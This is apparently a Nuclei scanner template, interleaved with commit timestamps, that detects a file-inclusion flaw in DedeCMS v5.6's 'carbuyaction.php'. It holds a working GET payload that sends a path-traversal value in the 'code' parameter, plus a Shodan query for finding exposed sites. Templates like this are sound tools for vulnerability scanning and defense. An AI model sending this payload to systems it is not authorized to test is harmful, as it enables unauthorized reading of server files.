2021-03-15 08:40:45 +00:00
id : dedecms-carbuyaction-fileinclude
info :
name : DedeCmsV5.6 Carbuyaction Fileinclude
author : pikpikcu
severity : high
2021-10-14 13:28:41 +00:00
description : A vulnerability in DedeCMS's 'carbuyaction.php' endpoint allows remote attackers to return the content of locally stored files via a vulnerability in the 'code' parameter.
2022-04-22 10:38:41 +00:00
reference :
- https://www.cnblogs.com/milantgh/p/3615986.html
2022-05-12 14:18:36 +00:00
metadata :
verified : true
2023-10-14 11:27:55 +00:00
max-request : 1
2022-05-12 14:18:36 +00:00
shodan-query : http.html:"power by dedecms" || title:"dedecms"
2021-03-15 08:40:45 +00:00
tags : dedecms
2023-04-27 04:28:59 +00:00
http :
2021-03-15 08:40:45 +00:00
- method : GET
path :
- '{{BaseURL}}/plus/carbuyaction.php?dopost=return&code=../../'
2023-10-14 11:27:55 +00:00
2021-03-15 08:40:45 +00:00
headers :
Cookie : code=cod
2022-10-07 21:27:25 +00:00
host-redirects : true
2021-03-15 08:40:45 +00:00
matchers-condition : and
matchers :
- type : word
words :
- "Cod::respond()"
part : body
condition : and
- type : status
status :
- 200
2023-10-20 11:41:13 +00:00
# digest: 4a0a004730450220705c0901bb2debdb5f0d26f01cbf9af70a8ef4a2e60cec83f54a336933ed1756022100d6a8d6191c1622538f5363f09e96753c9f24a494ede7f641998d4ea7d3556688:922c64590222798bb761d5b6d8e72950